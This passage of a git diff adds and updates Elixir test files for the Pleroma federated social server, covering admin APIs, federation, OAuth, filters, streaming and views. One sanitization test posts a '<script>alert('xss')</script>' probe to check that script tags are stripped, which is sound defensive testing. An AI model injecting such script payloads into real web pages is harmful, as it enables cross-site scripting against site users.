+2,7 @@ defmodule Pleroma.Web.ActivityPub.ObjectViewTest do use Pleroma.DataCase import Pleroma.Factory + alias Pleroma.Web.CommonAPI alias Pleroma.Web.ActivityPub.ObjectView test "renders a note object" do @@ -13,5 +14,45 @@ defmodule Pleroma.Web.ActivityPub.ObjectViewTest do assert result["to"] == note.data["to"] assert result["content"] == note.data["content"] assert result["type"] == "Note" + assert result["@context"] + end + + test "renders a note activity" do + note = insert(:note_activity) + + result = ObjectView.render("object.json", %{object: note}) + + assert result["id"] == note.data["id"] + assert result["to"] == note.data["to"] + assert result["object"]["type"] == "Note" + assert result["object"]["content"] == note.data["object"]["content"] + assert result["type"] == "Create" + assert result["@context"] + end + + test "renders a like activity" do + note = insert(:note_activity) + user = insert(:user) + + {:ok, like_activity, _} = CommonAPI.favorite(note.id, user) + + result = ObjectView.render("object.json", %{object: like_activity}) + + assert result["id"] == like_activity.data["id"] + assert result["object"] == note.data["object"]["id"] + assert result["type"] == "Like" + end + + test "renders an announce activity" do + note = insert(:note_activity) + user = insert(:user) + + {:ok, announce_activity, _} = CommonAPI.repeat(note.id, user) + + result = ObjectView.render("object.json", %{object: announce_activity}) + + assert result["id"] == announce_activity.data["id"] + assert result["object"] == note.data["object"]["id"] + assert result["type"] == "Announce" end end diff --git a/test/web/admin_api/admin_api_controller_test.exs b/test/web/admin_api/admin_api_controller_test.exs new file mode 100644 index 000000000..fa0cb71bf --- /dev/null +++ b/test/web/admin_api/admin_api_controller_test.exs @@ -0,0 +1,112 @@ +defmodule Pleroma.Web.AdminAPI.AdminAPIControllerTest do + use Pleroma.Web.ConnCase + + alias Pleroma.{Repo, User} + + import Pleroma.Factory + import ExUnit.CaptureLog + + describe "/api/pleroma/admin/user" do + test "Delete" do + admin = insert(:user, info: %{"is_admin" => true}) + user = insert(:user) + + conn = + build_conn() + |> assign(:user, admin) + |> put_req_header("accept", "application/json") + |> delete("/api/pleroma/admin/user?nickname=#{user.nickname}") + + assert json_response(conn, 200) == user.nickname + end + + test "Create" do + admin = insert(:user, info: %{"is_admin" => true}) + + conn = + build_conn() + |> assign(:user, admin) + |> put_req_header("accept", "application/json") + |> post("/api/pleroma/admin/user", %{ + "nickname" => "lain", + "email" => "lain@example.org", + "password" => "test" + }) + + assert json_response(conn, 200) == "lain" + end + end + + describe "/api/pleroma/admin/permission_group" do + test "GET is giving user_info" do + admin = insert(:user, info: %{"is_admin" => true}) + + conn = + build_conn() + |> assign(:user, admin) + |> put_req_header("accept", "application/json") + |> get("/api/pleroma/admin/permission_group/#{admin.nickname}") + + assert json_response(conn, 200) == admin.info + end + + test "/:right POST, can add to a permission group" do + admin = insert(:user, info: %{"is_admin" => true}) + user = insert(:user) + + user_info = + user.info + |> Map.put("is_admin", true) + + conn = + build_conn() + |> assign(:user, admin) + |> put_req_header("accept", "application/json") + |> post("/api/pleroma/admin/permission_group/#{user.nickname}/admin") + + assert json_response(conn, 200) == user_info + end + + test "/:right DELETE, can remove from a permission group" do + admin = insert(:user, info: %{"is_admin" => true}) + user = insert(:user, info: %{"is_admin" => true}) + + user_info = + user.info + |> Map.put("is_admin", false) + + conn = + build_conn() + |> assign(:user, admin) + |> put_req_header("accept", "application/json") + |> delete("/api/pleroma/admin/permission_group/#{user.nickname}/admin") + + assert json_response(conn, 200) == user_info + end + end + + test "/api/pleroma/admin/invite_token" do + admin = insert(:user, info: %{"is_admin" => true}) + + conn = + build_conn() + |> assign(:user, admin) + |> put_req_header("accept", "application/json") + |> get("/api/pleroma/admin/invite_token") + + assert conn.status == 200 + end + + test "/api/pleroma/admin/password_reset" do + admin = insert(:user, info: %{"is_admin" => true}) + user = insert(:user, info: %{"is_admin" => true}) + + conn = + build_conn() + |> assign(:user, admin) + |> put_req_header("accept", "application/json") + |> get("/api/pleroma/admin/password_reset?nickname=#{user.nickname}") + + assert conn.status == 200 + end +end diff --git a/test/web/common_api/common_api_test.exs b/test/web/common_api/common_api_test.exs index a5da271b3..cd36e409c 100644 --- a/test/web/common_api/common_api_test.exs +++ b/test/web/common_api/common_api_test.exs @@ -1,6 +1,7 @@ defmodule Pleroma.Web.CommonAPI.Test do use Pleroma.DataCase alias Pleroma.Web.CommonAPI + alias Pleroma.User import Pleroma.Factory @@ -10,4 +11,46 @@ defmodule Pleroma.Web.CommonAPI.Test do assert activity.data["object"]["tag"] == ["2hu"] end + + test "it adds emoji when updating profiles" do + user = insert(:user, %{name: ":karjalanpiirakka:"}) + + CommonAPI.update(user) + user = User.get_cached_by_ap_id(user.ap_id) + [karjalanpiirakka] = user.info["source_data"]["tag"] + + assert karjalanpiirakka["name"] == ":karjalanpiirakka:" + end + + describe "posting" do + test "it filters out obviously bad tags when accepting a post as HTML" do + user = insert(:user) + + post = "<p><b>2hu</b></p><script>alert('xss')</script>" + + {:ok, activity} = + CommonAPI.post(user, %{ + "status" => post, + "content_type" => "text/html" + }) + + content = activity.data["object"]["content"] + assert content == "<p><b>2hu</b></p>alert('xss')" + end + + test "it filters out obviously bad tags when accepting a post as Markdown" do + user = insert(:user) + + post = "<p><b>2hu</b></p><script>alert('xss')</script>" + + {:ok, activity} = + CommonAPI.post(user, %{ + "status" => post, + "content_type" => "text/markdown" + }) + + content = activity.data["object"]["content"] + assert content == "<p><b>2hu</b></p>alert('xss')" + end + end end diff --git a/test/web/common_api/common_api_utils_test.exs b/test/web/common_api/common_api_utils_test.exs index f39472ee3..b01ce04f8 100644 --- a/test/web/common_api/common_api_utils_test.exs +++ b/test/web/common_api/common_api_utils_test.exs @@ -1,5 +1,6 @@ defmodule Pleroma.Web.CommonAPI.UtilsTest do alias Pleroma.Web.CommonAPI.Utils + alias Pleroma.Web.Endpoint alias Pleroma.Builders.{UserBuilder} use Pleroma.DataCase @@ -29,4 +30,26 @@ defmodule Pleroma.Web.CommonAPI.UtilsTest do assert Utils.confirm_current_password(user, "test") == {:ok, user} end end + + test "parses emoji from name and bio" do + {:ok, user} = UserBuilder.insert(%{name: ":karjalanpiirakka:", bio: ":perkele:"}) + + expected = [ + %{ + "type" => "Emoji", + "icon" => %{"type" => "Image", "url" => "#{Endpoint.url()}/finmoji/128px/perkele-128.png"}, + "name" => ":perkele:" + }, + %{ + "type" => "Emoji", + "icon" => %{ + "type" => "Image", + "url" => "#{Endpoint.url()}/finmoji/128px/karjalanpiirakka-128.png" + }, + "name" => ":karjalanpiirakka:" + } + ] + + assert expected == Utils.emoji_from_profile(user) + end end diff --git a/test/web/federator_test.exs b/test/web/federator_test.exs index 09533362a..02e1ca76e 100644 --- a/test/web/federator_test.exs +++ b/test/web/federator_test.exs @@ -1,6 +1,9 @@ defmodule Pleroma.Web.FederatorTest do alias Pleroma.Web.Federator + alias Pleroma.Web.CommonAPI use Pleroma.DataCase + import Pleroma.Factory + import Mock test "enqueues an element according to priority" do queue = [%{item: 1, priority: 2}] @@ -17,4 +20,83 @@ defmodule Pleroma.Web.FederatorTest do assert {2, [%{item: 1, priority: 2}]} = Federator.queue_pop(queue) end + + describe "Publish an activity" do + setup do + user = insert(:user) + {:ok, activity} = CommonAPI.post(user, %{"status" => "HI"}) + + relay_mock = { + Pleroma.Web.ActivityPub.Relay, + [], + [publish: fn _activity -> send(self(), :relay_publish) end] + } + + %{activity: activity, relay_mock: relay_mock} + end + + test "with relays active, it publishes to the relay", %{ + activity: activity, + relay_mock: relay_mock + } do + with_mocks([relay_mock]) do + Federator.handle(:publish, activity) + end + + assert_received :relay_publish + end + + test "with relays deactivated, it does not publish to the relay", %{ + activity: activity, + relay_mock: relay_mock + } do + Pleroma.Config.put([:instance, :allow_relay], false) + + with_mocks([relay_mock]) do + Federator.handle(:publish, activity) + end + + refute_received :relay_publish + + Pleroma.Config.put([:instance, :allow_relay], true) + end + end + + describe "Receive an activity" do + test "successfully processes incoming AP docs with correct origin" do + params = %{ + "@context" => "https://www.w3.org/ns/activitystreams", + "actor" => "http://mastodon.example.org/users/admin", + "type" => "Create", + "id" => "http://mastodon.example.org/users/admin/activities/1", + "object" => %{ + "type" => "Note", + "content" => "hi world!", + "id" => "http://mastodon.example.org/users/admin/objects/1", + "attributedTo" => "http://mastodon.example.org/users/admin" + }, + "to" => ["https://www.w3.org/ns/activitystreams#Public"] + } + + {:ok, _activity} = Federator.handle(:incoming_ap_doc, params) + end + + test "rejects incoming AP docs with incorrect origin" do + params = %{ + "@context" => "https://www.w3.org/ns/activitystreams", + "actor" => "https://niu.moe/users/rye", + "type" => "Create", + "id" => "http://mastodon.example.org/users/admin/activities/1", + "object" => %{ + "type" => "Note", + "content" => "hi world!", + "id" => "http://mastodon.example.org/users/admin/objects/1", + "attributedTo" => "http://mastodon.example.org/users/admin" + }, + "to" => ["https://www.w3.org/ns/activitystreams#Public"] + } + + :error = Federator.handle(:incoming_ap_doc, params) + end + end end diff --git a/test/web/mastodon_api/account_view_test.exs b/test/web/mastodon_api/account_view_test.exs index 35c8a1fb0..dc52b92bc 100644 --- a/test/web/mastodon_api/account_view_test.exs +++ b/test/web/mastodon_api/account_view_test.exs @@ -49,10 +49,48 @@ defmodule Pleroma.Web.MastodonAPI.AccountViewTest do } ], fields: [], + bot: false, source: %{ note: "", privacy: "public", - sensitive: "false" + sensitive: false + } + } + + assert expected == AccountView.render("account.json", %{user: user}) + end + + test "Represent a Service(bot) account" do + user = + insert(:user, %{ + info: %{"note_count" => 5, "follower_count" => 3, "source_data" => %{"type" => "Service"}}, + nickname: "shp@shitposter.club", + inserted_at: ~N[2017-08-15 15:47:06.597036] + }) + + expected = %{ + id: to_string(user.id), + username: "shp", + acct: user.nickname, + display_name: user.name, + locked: false, + created_at: "2017-08-15T15:47:06.000Z", + followers_count: 3, + following_count: 0, + statuses_count: 5, + note: user.bio, + url: user.ap_id, + avatar: "http://localhost:4001/images/avi.png", + avatar_static: "http://localhost:4001/images/avi.png", + header: "http://localhost:4001/images/banner.png", + header_static: "http://localhost:4001/images/banner.png", + emojis: [], + fields: [], + bot: true, + source: %{ + note: "", + privacy: "public", + sensitive: false } } @@ -85,8 +123,11 @@ defmodule Pleroma.Web.MastodonAPI.AccountViewTest do followed_by: false, blocking: true, muting: false, + muting_notifications: false, requested: false, - domain_blocking: false + domain_blocking: false, + showing_reblogs: false, + endorsed: false } assert expected == AccountView.render("relationship.json", %{user: user, target: other_user}) diff --git a/test/web/mastodon_api/mastodon_api_controller_test.exs b/test/web/mastodon_api/mastodon_api_controller_test.exs index 9e33c1d04..ad67cae6b 100644 --- a/test/web/mastodon_api/mastodon_api_controller_test.exs +++ b/test/web/mastodon_api/mastodon_api_controller_test.exs @@ -178,6 +178,32 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPIControllerTest do |> get("api/v1/timelines/home") [_s1, _s2] = json_response(res_conn, 200) + + # Test pagination + Enum.each(1..20, fn _ -> + {:ok, _} = + CommonAPI.post(user_one, %{ + "status" => "Hi @#{user_two.nickname}!", + "visibility" => "direct" + }) + end) + + res_conn = + conn + |> assign(:user, user_two) + |> get("api/v1/timelines/direct") + + statuses = json_response(res_conn, 200) + assert length(statuses) == 20 + + res_conn = + conn + |> assign(:user, user_two) + |> get("api/v1/timelines/direct", %{max_id: List.last(statuses)["id"]}) + + [status] = json_response(res_conn, 200) + + assert status["url"] != direct.data["id"] end test "replying to a status", %{conn: conn} do @@ -198,6 +224,21 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPIControllerTest do assert activity.data["object"]["inReplyToStatusId"] == replied_to.id end + test "posting a status with an invalid in_reply_to_id", %{conn: conn} do + user = insert(:user) + + conn = + conn + |> assign(:user, user) + |> post("/api/v1/statuses", %{"status" => "xD", "in_reply_to_id" => ""}) + + assert %{"content" => "xD", "id" => id} = json_response(conn, 200) + + activity = Repo.get(Activity, id) + + assert activity + end + test "verify_credentials", %{conn: conn} do user = insert(:user) @@ -206,7 +247,19 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPIControllerTest do |> assign(:user, user) |> get("/api/v1/accounts/verify_credentials") - assert %{"id" => id} = json_response(conn, 200) + assert %{"id" => id, "source" => %{"privacy" => "public"}} = json_response(conn, 200) + assert id == to_string(user.id) + end + + test "verify_credentials default scope unlisted", %{conn: conn} do + user = insert(:user, %{info: %{"default_scope" => "unlisted"}}) + + conn = + conn + |> assign(:user, user) + |> get("/api/v1/accounts/verify_credentials") + + assert %{"id" => id, "source" => %{"privacy" => "unlisted"}} = json_response(conn, 200) assert id == to_string(user.id) end @@ -251,6 +304,127 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPIControllerTest do end end + describe "filters" do + test "creating a filter", %{conn: conn} do + user = insert(:user) + + filter = %Pleroma.Filter{ + phrase: "knights", + context: ["home"] + } + + conn = + conn + |> assign(:user, user) + |> post("/api/v1/filters", %{"phrase" => filter.phrase, context: filter.context}) + + assert response = json_response(conn, 200) + assert response["phrase"] == filter.phrase + assert response["context"] == filter.context + assert response["id"] != nil + assert response["id"] != "" + end + + test "fetching a list of filters", %{conn: conn} do + user = insert(:user) + + query_one = %Pleroma.Filter{ + user_id: user.id, + filter_id: 1, + phrase: "knights", + context: ["home"] + } + + query_two = %Pleroma.Filter{ + user_id: user.id, + filter_id: 2, + phrase: "who", + context: ["home"] + } + + {:ok, filter_one} = Pleroma.Filter.create(query_one) + {:ok, filter_two} = Pleroma.Filter.create(query_two) + + conn = + conn + |> assign(:user, user) + |> get("/api/v1/filters") + + assert response = json_response(conn, 200) + end + + test "get a filter", %{conn: conn} do + user = insert(:user) + + query = %Pleroma.Filter{ + user_id: user.id, + filter_id: 2, + phrase: "knight", + context: ["home"] + } + + {:ok, filter} = Pleroma.Filter.create(query) + + conn = + conn + |> assign(:user, user) + |> get("/api/v1/filters/#{filter.filter_id}") + + assert response = json_response(conn, 200) + end + + test "update a filter", %{conn: conn} do + user = insert(:user) + + query = %Pleroma.Filter{ + user_id: user.id, + filter_id: 2, + phrase: "knight", + context: ["home"] + } + + {:ok, filter} = Pleroma.Filter.create(query) + + new = %Pleroma.Filter{ + phrase: "nii", + context: ["home"] + } + + conn = + conn + |> assign(:user, user) + |> put("/api/v1/filters/#{query.filter_id}", %{ + phrase: new.phrase, + context: new.context + }) + + assert response = json_response(conn, 200) + assert response["phrase"] == new.phrase + assert response["context"] == new.context + end + + test "delete a filter", %{conn: conn} do + user = insert(:user) + + query = %Pleroma.Filter{ + user_id: user.id, + filter_id: 2, + phrase: "knight", + context: ["home"] + } + + {:ok, filter} = Pleroma.Filter.create(query) + + conn = + conn + |> assign(:user, user) + |> delete("/api/v1/filters/#{filter.filter_id}") + + assert response = json_response(conn, 200) + assert response == %{} + end + end + describe "lists" do test "creating a list", %{conn: conn} do user = insert(:user) @@ -368,6 +542,30 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPIControllerTest do assert id == to_string(activity_two.id) end + + test "list timeline does not leak non-public statuses for unfollowed users", %{conn: conn} do + user = insert(:user) + other_user = insert(:user) + {:ok, activity_one} = TwitterAPI.create_status(other_user, %{"status" => "Marisa is cute."}) + + {:ok, activity_two} = + TwitterAPI.create_status(other_user, %{ + "status" => "Marisa is cute.", + "visibility" => "private" + }) + + {:ok, list} = Pleroma.List.create("name", user) + {:ok, list} = Pleroma.List.follow(list, other_user) + + conn = + conn + |> assign(:user, user) + |> get("/api/v1/timelines/list/#{list.id}") + + assert [%{"id" => id}] = json_response(conn, 200) + + assert id == to_string(activity_one.id) + end end describe "notifications" do @@ -691,6 +889,18 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPIControllerTest do assert User.following?(other_user, user) == true end + test "verify_credentials", %{conn: conn} do + user = insert(:user, %{info: %{"default_scope" => "private"}}) + + conn = + conn + |> assign(:user, user) + |> get("/api/v1/accounts/verify_credentials") + + assert %{"id" => id, "source" => %{"privacy" => "private"}} = json_response(conn, 200) + assert id == to_string(user.id) + end + test "/api/v1/follow_requests/:id/reject works" do user = insert(:user, %{info: %{"locked" => true}}) other_user = insert(:user) @@ -760,11 +970,20 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPIControllerTest do {:ok, [_activity]} = OStatus.fetch_activity_from_url("https://shitposter.club/notice/2827873") - conn = + nconn = conn |> get("/api/v1/timelines/tag/2hu") - assert [%{"id" => id}] = json_response(conn, 200) + assert [%{"id" => id}] = json_response(nconn, 200) + + assert id == to_string(activity.id) + + # works for different capitalization too + nconn = + conn + |> get("/api/v1/timelines/tag/2HU") + + assert [%{"id" => id}] = json_response(nconn, 200) assert id == to_string(activity.id) end) diff --git a/test/web/mastodon_api/mastodon_socket_test.exs b/test/web/mastodon_api/mastodon_socket_test.exs new file mode 100644 index 000000000..c7d71defc --- /dev/null +++ b/test/web/mastodon_api/mastodon_socket_test.exs @@ -0,0 +1,33 @@ +defmodule Pleroma.Web.MastodonApi.MastodonSocketTest do + use Pleroma.DataCase + + alias Pleroma.Web.MastodonApi.MastodonSocket + alias Pleroma.Web.{Streamer, CommonAPI} + alias Pleroma.User + + import Pleroma.Factory + + test "public is working when non-authenticated" do + user = insert(:user) + + task = + Task.async(fn -> + assert_receive {:text, _}, 4_000 + end) + + fake_socket = %{ + transport_pid: task.pid, + assigns: %{} + } + + topics = %{ + "public" => [fake_socket] + } + + {:ok, activity} = CommonAPI.post(user, %{"status" => "Test"}) + + Streamer.push_to_socket(topics, "public", activity) + + Task.await(task) + end +end diff --git a/test/web/mastodon_api/status_view_test.exs b/test/web/mastodon_api/status_view_test.exs index 03c798bef..31554a07d 100644 --- a/test/web/mastodon_api/status_view_test.exs +++ b/test/web/mastodon_api/status_view_test.exs @@ -7,6 +7,24 @@ defmodule Pleroma.Web.MastodonAPI.StatusViewTest do alias Pleroma.Web.CommonAPI import Pleroma.Factory + test "a note with null content" do + note = insert(:note_activity) + + data = + note.data + |> put_in(["object", "content"], nil) + + note = + note + |> Map.put(:data, data) + + user = User.get_cached_by_ap_id(note.data["actor"]) + + status = StatusView.render("status.json", %{activity: note}) + + assert status.content == "" + end + test "a note activity" do note = insert(:note_activity) user = User.get_cached_by_ap_id(note.data["actor"]) @@ -28,6 +46,7 @@ defmodule Pleroma.Web.MastodonAPI.StatusViewTest do content: HtmlSanitizeEx.basic_html(note.data["object"]["content"]), created_at: created_at, reblogs_count: 0, + replies_count: 0, favourites_count: 0, reblogged: false, favourited: false, @@ -47,7 +66,8 @@ defmodule Pleroma.Web.MastodonAPI.StatusViewTest do %{ shortcode: "2hu", url: "corndog.png", - static_url: "corndog.png" + static_url: "corndog.png", + visible_in_picker: false } ] } diff --git a/test/web/node_info_test.exs b/test/web/node_info_test.exs new file mode 100644 index 000000000..a6376453c --- /dev/null +++ b/test/web/node_info_test.exs @@ -0,0 +1,49 @@ +defmodule Pleroma.Web.NodeInfoTest do + use Pleroma.Web.ConnCase + + import Pleroma.Factory + + test "nodeinfo shows staff accounts", %{conn: conn} do + user = insert(:user, %{local: true, info: %{"is_moderator" => true}}) + + conn = + conn + |> get("/nodeinfo/2.0.json") + + assert result = json_response(conn, 200) + + assert user.ap_id in result["metadata"]["staffAccounts"] + end + + test "returns 404 when federation is disabled" do + instance = + Application.get_env(:pleroma, :instance) + |> Keyword.put(:federating, false) + + Application.put_env(:pleroma, :instance, instance) + + conn + |> get("/.well-known/nodeinfo") + |> json_response(404) + + conn + |> get("/nodeinfo/2.0.json") + |> json_response(404) + + instance = + Application.get_env(:pleroma, :instance) + |> Keyword.put(:federating, true) + + Application.put_env(:pleroma, :instance, instance) + end + + test "returns 200 when federation is enabled" do + conn + |> get("/.well-known/nodeinfo") + |> json_response(200) + + conn + |> get("/nodeinfo/2.0.json") + |> json_response(200) + end +end diff --git a/test/web/oauth/authorization_test.exs b/test/web/oauth/authorization_test.exs index 4a9e2a3ac..98c7c4133 100644 --- a/test/web/oauth/authorization_test.exs +++ b/test/web/oauth/authorization_test.exs @@ -55,4 +55,26 @@ defmodule Pleroma.Web.OAuth.AuthorizationTest do assert {:error, "token expired"} == Authorization.use_token(expired_auth) end + + test "delete authorizations" do + {:ok, app} = + Repo.insert( + App.register_changeset(%App{}, %{ + client_name: "client", + scopes: "scope", + redirect_uris: "url" + }) + ) + + user = insert(:user) + + {:ok, auth} = Authorization.create_authorization(app, user) + {:ok, auth} = Authorization.use_token(auth) + + {auths, _} = Authorization.delete_user_authorizations(user) + + {_, invalid} = Authorization.use_token(auth) + + assert auth != invalid + end end diff --git a/test/web/oauth/token_test.exs b/test/web/oauth/token_test.exs index 58448949c..f926ff50b 100644 --- a/test/web/oauth/token_test.exs +++ b/test/web/oauth/token_test.exs @@ -29,4 +29,36 @@ defmodule Pleroma.Web.OAuth.TokenTest do auth = Repo.get(Authorization, auth.id) {:error, "already used"} = Token.exchange_token(app, auth) end + + test "deletes all tokens of a user" do + {:ok, app1} = + Repo.insert( + App.register_changeset(%App{}, %{ + client_name: "client1", + scopes: "scope", + redirect_uris: "url" + }) + ) + + {:ok, app2} = + Repo.insert( + App.register_changeset(%App{}, %{ + client_name: "client2", + scopes: "scope", + redirect_uris: "url" + }) + ) + + user = insert(:user) + + {:ok, auth1} = Authorization.create_authorization(app1, user) + {:ok, auth2} = Authorization.create_authorization(app2, user) + + {:ok, token1} = Token.exchange_token(app1, auth1) + {:ok, token2} = Token.exchange_token(app2, auth2) + + {tokens, _} = Token.delete_user_tokens(user) + + assert tokens == 2 + end end diff --git a/test/web/ostatus/ostatus_controller_test.exs b/test/web/ostatus/ostatus_controller_test.exs index c23b175e8..371c835c0 100644 --- a/test/web/ostatus/ostatus_controller_test.exs +++ b/test/web/ostatus/ostatus_controller_test.exs @@ -2,6 +2,7 @@ defmodule Pleroma.Web.OStatus.OStatusControllerTest do use Pleroma.Web.ConnCase import Pleroma.Factory alias Pleroma.{User, Repo} + alias Pleroma.Web.CommonAPI alias Pleroma.Web.OStatus.ActivityRepresenter test "decodes a salmon", %{conn: conn} do @@ -167,6 +168,32 @@ defmodule Pleroma.Web.OStatus.OStatusControllerTest do assert json_response(conn, 200) end + test "only gets a notice in AS2 format for Create messages", %{conn: conn} do + note_activity = insert(:note_activity) + url = "/notice/#{note_activity.id}" + + conn = + conn + |> put_req_header("accept", "application/activity+json") + |> get(url) + + assert json_response(conn, 200) + + user = insert(:user) + + {:ok, like_activity, _} = CommonAPI.favorite(note_activity.id, user) + url = "/notice/#{like_activity.id}" + + assert like_activity.data["type"] == "Like" + + conn = + build_conn() + |> put_req_header("accept", "application/activity+json") + |> get(url) + + assert response(conn, 404) + end + test "gets an activity in AS2 format", %{conn: conn} do note_activity = insert(:note_activity) [_, uuid] = hd(Regex.scan(~r/.+\/([\w-]+)$/, note_activity.data["id"])) diff --git a/test/web/ostatus/ostatus_test.exs b/test/web/ostatus/ostatus_test.exs index f095e41dd..f95da8b0a 100644 --- a/test/web/ostatus/ostatus_test.exs +++ b/test/web/ostatus/ostatus_test.exs @@ -456,4 +456,28 @@ defmodule Pleroma.Web.OStatusTest do "https://www.w3.org/ns/activitystreams#Public" ] end + + describe "is_representable?" do + test "Note objects are representable" do + note_activity = insert(:note_activity) + + assert OStatus.is_representable?(note_activity) + end + + test "Article objects are not representable" do + note_activity = insert(:note_activity) + + note_object = Object.normalize(note_activity.data["object"]) + + note_data = + note_object.data + |> Map.put("type", "Article") + + cs = Object.change(note_object, %{data: note_data}) + {:ok, article_object} = Repo.update(cs) + + # the underlying object is now an Article instead of a note, so this should fail + refute OStatus.is_representable?(note_activity) + end + end end diff --git a/test/web/plugs/federating_plug_test.exs b/test/web/plugs/federating_plug_test.exs new file mode 100644 index 000000000..1455a1c46 --- /dev/null +++ b/test/web/plugs/federating_plug_test.exs @@ -0,0 +1,33 @@ +defmodule Pleroma.Web.FederatingPlugTest do + use Pleroma.Web.ConnCase + + test "returns and halt the conn when federating is disabled" do + instance = + Application.get_env(:pleroma, :instance) + |> Keyword.put(:federating, false) + + Application.put_env(:pleroma, :instance, instance) + + conn = + build_conn() + |> Pleroma.Web.FederatingPlug.call(%{}) + + assert conn.status == 404 + assert conn.halted + + instance = + Application.get_env(:pleroma, :instance) + |> Keyword.put(:federating, true) + + Application.put_env(:pleroma, :instance, instance) + end + + test "does nothing when federating is enabled" do + conn = + build_conn() + |> Pleroma.Web.FederatingPlug.call(%{}) + + refute conn.status + refute conn.halted + end +end diff --git a/test/web/retry_queue_test.exs b/test/web/retry_queue_test.exs new file mode 100644 index 000000000..ce2964993 --- /dev/null +++ b/test/web/retry_queue_test.exs @@ -0,0 +1,31 @@ +defmodule MockActivityPub do + def publish_one(ret) do + {ret, "success"} + end +end + +defmodule Pleroma.ActivityTest do + use Pleroma.DataCase + alias Pleroma.Web.Federator.RetryQueue + + @small_retry_count 0 + @hopeless_retry_count 10 + + test "failed posts are retried" do + {:retry, _timeout} = RetryQueue.get_retry_params(@small_retry_count) + + assert {:noreply, %{delivered: 1}} == + RetryQueue.handle_info({:send, :ok, MockActivityPub, @small_retry_count}, %{ + delivered: 0 + }) + end + + test "posts that have been tried too many times are dropped" do + {:drop, _timeout} = RetryQueue.get_retry_params(@hopeless_retry_count) + + assert {:noreply, %{dropped: 1}} == + RetryQueue.handle_cast({:maybe_enqueue, %{}, nil, @hopeless_retry_count}, %{ + dropped: 0 + }) + end +end diff --git a/test/web/streamer_test.exs b/test/web/streamer_test.exs index 47d491d1b..df58441f0 100644 --- a/test/web/streamer_test.exs +++ b/test/web/streamer_test.exs @@ -2,7 +2,7 @@ defmodule Pleroma.Web.StreamerTest do use Pleroma.DataCase alias Pleroma.Web.Streamer - alias Pleroma.User + alias Pleroma.{List, User} alias Pleroma.Web.CommonAPI import Pleroma.Factory @@ -60,4 +60,111 @@ defmodule Pleroma.Web.StreamerTest do Task.await(task) end + + test "it doesn't send unwanted DMs to list" do + user_a = insert(:user) + user_b = insert(:user) + user_c = insert(:user) + + {:ok, user_a} = User.follow(user_a, user_b) + + {:ok, list} = List.create("Test", user_a) + {:ok, list} = List.follow(list, user_b) + + task = + Task.async(fn -> + refute_receive {:text, _}, 1_000 + end) + + fake_socket = %{ + transport_pid: task.pid, + assigns: %{ + user: user_a + } + } + + {:ok, activity} = + CommonAPI.post(user_b, %{ + "status" => "@#{user_c.nickname} Test", + "visibility" => "direct" + }) + + topics = %{ + "list:#{list.id}" => [fake_socket] + } + + Streamer.handle_cast(%{action: :stream, topic: "list", item: activity}, topics) + + Task.await(task) + end + + test "it doesn't send unwanted private posts to list" do + user_a = insert(:user) + user_b = insert(:user) + + {:ok, list} = List.create("Test", user_a) + {:ok, list} = List.follow(list, user_b) + + task = + Task.async(fn -> + refute_receive {:text, _}, 1_000 + end) + + fake_socket = %{ + transport_pid: task.pid, + assigns: %{ + user: user_a + } + } + + {:ok, activity} = + CommonAPI.post(user_b, %{ + "status" => "Test", + "visibility" => "private" + }) + + topics = %{ + "list:#{list.id}" => [fake_socket] + } + + Streamer.handle_cast(%{action: :stream, topic: "list", item: activity}, topics) + + Task.await(task) + end + + test "it send wanted private posts to list" do + user_a = insert(:user) + user_b = insert(:user) + + {:ok, user_a} = User.follow(user_a, user_b) + + {:ok, list} = List.create("Test", user_a) + {:ok, list} = List.follow(list, user_b) + + task = + Task.async(fn -> + assert_receive {:text, _}, 1_000 + end) + + fake_socket = %{ + transport_pid: task.pid, + assigns: %{ + user: user_a + } + } + + {:ok, activity} = + CommonAPI.post(user_b, %{ + "status" => "Test", + "visibility" => "private" + }) + + topics = %{ + "list:#{list.id}" => [fake_socket] + } + + Streamer.handle_cast(%{action: :stream, topic: "list", item: activity}, topics) + + Task.await(task) + end end diff --git a/test/web/twitter_api/representers/activity_representer_test.exs b/test/web/twitter_api/representers/activity_representer_test.exs index 3f85e028b..291fd5237 100644 --- a/test/web/twitter_api/representers/activity_representer_test.exs +++ b/test/web/twitter_api/representers/activity_representer_test.exs @@ -126,7 +126,7 @@ defmodule Pleroma.Web.TwitterAPI.Representers.ActivityRepresenterTest do } expected_html = - "<p>2hu</p>alert('YAY')Some <img height='32px' width='32px' alt='2hu' title='2hu' src='corndog.png' /> content mentioning <a href=\"#{ + "<p>2hu</p>alert('YAY')Some <img height=\"32px\" width=\"32px\" alt=\"2hu\" title=\"2hu\" src=\"corndog.png\" /> content mentioning <a href=\"#{ mentioned_user.ap_id }\">@shp</a>" @@ -139,6 +139,10 @@ defmodule Pleroma.Web.TwitterAPI.Representers.ActivityRepresenterTest do "is_post_verb" => true, "created_at" => "Tue May 24 13:26:08 +0000 2016", "in_reply_to_status_id" => 213_123, + "in_reply_to_screen_name" => nil, + "in_reply_to_user_id" => nil, + "in_reply_to_profileurl" => nil, + "in_reply_to_ostatus_uri" => nil, "statusnet_conversation_id" => convo_object.id, "attachments" => [ ObjectRepresenter.to_map(object) diff --git a/test/web/twitter_api/representers/object_representer_test.exs b/test/web/twitter_api/representers/object_representer_test.exs index ebac051dc..228b2ac42 100644 --- a/test/web/twitter_api/representers/object_representer_test.exs +++ b/test/web/twitter_api/representers/object_representer_test.exs @@ -23,7 +23,8 @@ defmodule Pleroma.Web.TwitterAPI.Representers.ObjectReprenterTest do id: 6, url: "someurl", mimetype: "sometype", - oembed: false + oembed: false, + description: nil } assert expected_object == ObjectRepresenter.to_map(object) @@ -46,7 +47,8 @@ defmodule Pleroma.Web.TwitterAPI.Representers.ObjectReprenterTest do "http://mastodon.example.org/system/media_attachments/files/000/000/001/original/8619f31c6edec470.png", mimetype: "image/png", oembed: false, - id: nil + id: nil, + description: "blabla" } assert expected_object == ObjectRepresenter.to_map(object) diff --git a/test/web/twitter_api/twitter_api_controller_test.exs b/test/web/twitter_api/twitter_api_controller_test.exs index 3a035e298..6bdcb4fd8 100644 --- a/test/web/twitter_api/twitter_api_controller_test.exs +++ b/test/web/twitter_api/twitter_api_controller_test.exs @@ -77,7 +77,8 @@ defmodule 